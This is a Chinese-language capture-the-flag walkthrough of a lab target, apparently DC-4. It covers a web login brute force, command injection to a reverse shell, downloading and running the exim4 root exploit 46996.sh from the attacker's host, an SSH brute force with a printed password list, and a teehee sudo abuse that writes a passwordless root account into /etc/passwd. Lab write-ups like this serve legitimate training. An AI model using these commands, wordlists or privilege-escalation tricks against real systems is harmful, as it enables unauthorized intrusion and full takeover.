信息搜集

扫描网段查看有一下存活的主机

1
arp-scan -l

image-20260802084905413

192.168.100.138就是靶机ip,看一下开放端口

image-20260802085334792

开放22端口和80端口。

扫一下目录

image-20260802100000591

漏洞利用

访问靶机是一个登入页面,尝试sqlmap失败,根据页面提示应该是admin用户,尝试爆破密码

image-20260802102849898

爆破出密码为happy,然后是有一个命令执行,抓包看一下,存在rce尝试写马没有成功,然后就反弹shell,这个要注意空格要改为+,

image-20260802104950498

反弹之后获取交互式shell

1
python -c "import pty; pty.spawn('/bin/bash')"

接下来就是提权,先看一下suid提权

1
find / -user root -perm -4000 -print 2>/dev/null

image-20260802105600228

查看一下exim4的版本

image-20260802111344209

该版本存在提权漏洞,找一下提权脚本

image-20260802111325756

在靶机中运行脚本就行。

1
2
cp /usr/share/exploitdb/exploits/linux/local/46996.sh .
python -m http.server 7777

然后在靶机用wget下载脚本,

1
wget http://192.168.100.128:7777/46996.sh

在那个目录没有权限,执行ls / -l查看以下

image-20260802112517832

tmp目录可读可写可执行

1
2
3
4
cd /tmp
wget http://192.168.100.128:7777/46996.sh
chmod +x 46996.sh
./46996.sh

image-20260802112954890

flag在tmp目录

image-20260802113015947

另解:

image-20260802114009878

在jim家里有备份文件看一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
target123
gwerty
1g2w3e4r
gwerty123
zag12wsx
7777777
qwerty1
1q2w3e4r
987654321
222222
qwe123
qwerty123
zxcvbnm
555555
112233
fuckyou
asdfghjkl
12345a
123123123
1q2w3e
qazwsx
loveme1
juventus
jennifer1
!~!1
bubbles
samuel
fuckoff
lovers
cheese1
0123456
123asd
999999999
madison
elizabeth1
music
buster1
lauren
david1
tigger1
123qweasd
taylor1
carlos
tinkerbell
samantha1
Sojdlg123aljg
joshua1
poop
stella
myspace123
asdasd5
freedom1
whatever1
xxxxxx
00000
valentina
a1b2c3
741852963
austin
monica
qaz123
lovely1
music1
harley1
family1
spongebob1
steven
nirvana
1234abcd
hellokitty
thomas1
cooper
520520
muffin
christian1
love13
fucku2
arsenal1
lucky7
diablo
apples
george1
babyboy1
crystal
1122334455
player1
aa123456
vfhbyf
forever1
Password
winston
chivas1
sexy
hockey1
1a2b3c4d
pussy
playboy1
stalker
cherry
tweety
toyota
creative
gemini
pretty1
maverick
brittany1
nathan1
letmein1
cameron1
secret1
google1
heaven
martina
murphy
spongebob
uQA9Ebw445
fernando
pretty
startfinding
softball
dolphin1
fuckme
test123
qwerty1234
kobe24
alejandro
adrian
september
aaaaaa1
bubba1
isabella
abc123456
password3
jason1
abcdefg123
loveyou1
shannon
100200
manuel
leonardo
molly1
flowers
123456z
007007
password.
321321
miguel
samsung1
sergey
sweet1
abc1234
windows
qwert123
vfrcbv
poohbear
d123456
school1
badboy
951753
123456c
111
steven1
snoopy1
garfield
YAgjecc826
compaq
candy1
sarah1
qwerty123456
123456l
eminem1
141414
789789
maria
steelers
iloveme1
morgan1
winner
boomer
lolita
nastya
alexis1
carmen
angelo
nicholas1
portugal
precious
jackass1
jonathan1
yfnfif
bitch
tiffany
rabbit
rainbow1
angel123
popcorn
barbara
brandy
starwars1
barney
natalia
jibril04
hiphop
tiffany1
shorty
poohbear1
simone
albert
marlboro
hardcore
cowboys
sydney
alex
scorpio
1234512345
q12345
qq123456
onelove
bond007
abcdefg1
eagles
crystal1
azertyuiop
winter
sexy12
angelina
james
svetlana
fatima
123456k
icecream
popcorn1

是一个密码本,上面搜集到的信息靶机开放了22端口,有密码,有用户名就可以爆破

image-20260802114703808

ssh登入进去提示有一封邮件,

image-20260802114951658

查看一下邮件

image-20260802115010043

这是charles发的 邮件,有密码切换一下用户然后查看一下权限

image-20260802115207907

有一个teehee

teeheetee 命令的变种工具,功能:读取标准输入,一边打印到屏幕,一边写入指定文件

我们是以root权限执行的,接下来可以利用这个往/etc/passwd文件写入一个免密登入的root用户

1
2
echo "hack::0:0::/root:/bin/bash" | sudo teehee -a /etc/passwd
su hack

image-20260802115735149